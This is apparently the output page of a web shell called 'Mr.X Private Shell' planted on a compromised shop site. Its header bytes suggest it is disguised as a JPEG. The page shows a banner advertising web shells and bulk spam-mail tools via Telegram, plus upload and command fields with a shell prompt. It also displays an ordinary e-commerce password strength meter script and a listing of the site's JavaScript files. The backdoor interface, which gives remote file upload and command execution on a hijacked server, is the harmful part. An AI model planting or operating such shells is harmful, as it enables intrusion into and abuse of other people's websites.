����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
/* global wp, pwsL10n, kkart_password_strength_meter_params */
( function( $ ) {
    'use strict';
	/**
	 * Password Strength Meter class.
	 */
	var kkart_password_strength_meter = {

		/**
		 * Initialize strength meter actions.
		 */
		init: function() {
			$( document.body )
				.on(
					'keyup change',
					'form.register #reg_password, form.checkout #account_password, ' +
					'form.edit-account #password_1, form.lost_reset_password #password_1',
					this.strengthMeter
				);
			$( 'form.checkout #createaccount' ).change();
		},

		/**
		 * Strength Meter.
		 */
		strengthMeter: function() {
			var wrapper       = $( 'form.register, form.checkout, form.edit-account, form.lost_reset_password' ),
				submit        = $( 'button[type="submit"]', wrapper ),
				field         = $( '#reg_password, #account_password, #password_1', wrapper ),
				strength      = 1,
				fieldValue    = field.val(),
				stop_checkout = ! wrapper.is( 'form.checkout' ); // By default is disabled on checkout.

			kkart_password_strength_meter.includeMeter( wrapper, field );

			strength = kkart_password_strength_meter.checkPasswordStrength( wrapper, field );

			// Allow password strength meter stop checkout.
			if ( kkart_password_strength_meter_params.stop_checkout ) {
				stop_checkout = true;
			}

			if (
				fieldValue.length > 0 &&
				strength < kkart_password_strength_meter_params.min_password_strength &&
				-1 !== strength &&
				stop_checkout
			) {
				submit.attr( 'disabled', 'disabled' ).addClass( 'disabled' );
			} else {
				submit.removeAttr( 'disabled', 'disabled' ).removeClass( 'disabled' );
			}
		},

		/**
		 * Include meter HTML.
		 *
		 * @param {Object} wrapper
		 * @param {Object} field
		 */
		includeMeter: function( wrapper, field ) {
			var meter = wrapper.find( '.kkart-password-strength' );

			if ( '' === field.val() ) {
				meter.hide();
				$( document.body ).trigger( 'kkart-password-strength-hide' );
			} else if ( 0 === meter.length ) {
				field.after( '<div class="kkart-password-strength" aria-live="polite"></div>' );
				$( document.body ).trigger( 'kkart-password-strength-added' );
			} else {
				meter.show();
				$( document.body ).trigger( 'kkart-password-strength-show' );
			}
		},

		/**
		 * Check password strength.
		 *
		 * @param {Object} field
		 *
		 * @return {Int}
		 */
		checkPasswordStrength: function( wrapper, field ) {
			var meter     = wrapper.find( '.kkart-password-strength' ),
				hint      = wrapper.find( '.kkart-password-hint' ),
				hint_html = '<small class="kkart-password-hint">' + kkart_password_strength_meter_params.i18n_password_hint + '</small>',
				strength  = wp.passwordStrength.meter( field.val(), wp.passwordStrength.userInputBlacklist() ),
				error     = '';

			// Reset.
			meter.removeClass( 'short bad good strong' );
			hint.remove();

			if ( meter.is( ':hidden' ) ) {
				return strength;
			}

			// Error to append
			if ( strength < kkart_password_strength_meter_params.min_password_strength ) {
				error = ' - ' + kkart_password_strength_meter_params.i18n_password_error;
			}

			switch ( strength ) {
				case 0 :
					meter.addClass( 'short' ).html( pwsL10n['short'] + error );
					meter.after( hint_html );
					break;
				case 1 :
					meter.addClass( 'bad' ).html( pwsL10n.bad + error );
					meter.after( hint_html );
					break;
				case 2 :
					meter.addClass( 'bad' ).html( pwsL10n.bad + error );
					meter.after( hint_html );
					break;
				case 3 :
					meter.addClass( 'good' ).html( pwsL10n.good + error );
					break;
				case 4 :
					meter.addClass( 'strong' ).html( pwsL10n.strong + error );
					break;
				case 5 :
					meter.addClass( 'short' ).html( pwsL10n.mismatch );
					break;
			}

			return strength;
		}
	};

	kkart_password_strength_meter.init();
})( jQuery );

Filemanager

Name Type Size Permission Actions
add-payment-method.js File 1.05 KB 0644
add-payment-method.min.js File 721 B 0644
add-to-cart-variation.js File 28.08 KB 0644
add-to-cart-variation.min.js File 13.88 KB 0644
add-to-cart.js File 5.68 KB 0644
add-to-cart.min.js File 3 KB 0644
address-i18n.js File 4.84 KB 0644
address-i18n.min.js File 2.56 KB 0644
cart-fragments.js File 5.57 KB 0644
cart-fragments.min.js File 2.92 KB 0644
cart.js File 15.25 KB 0644
cart.min.js File 7.33 KB 0644
checkout.js File 24.22 KB 0644
checkout.min.js File 13.55 KB 0644
country-select.js File 6.04 KB 0644
country-select.min.js File 3.22 KB 0644
credit-card-form.js File 612 B 0644
credit-card-form.min.js File 542 B 0644
geolocation.js File 2.5 KB 0644
geolocation.min.js File 1.3 KB 0644
kkart.js File 3.16 KB 0644
kkart.min.js File 1.92 KB 0644
lost-password.js File 159 B 0644
lost-password.min.js File 132 B 0644
password-strength-meter.js File 3.72 KB 0644
password-strength-meter.min.js File 1.98 KB 0644
price-slider.js File 2.85 KB 0644
price-slider.min.js File 1.99 KB 0644
single-product.js File 10.12 KB 0644
single-product.min.js File 6.13 KB 0644
tokenization-form.js File 3.72 KB 0644
tokenization-form.min.js File 2.17 KB 0644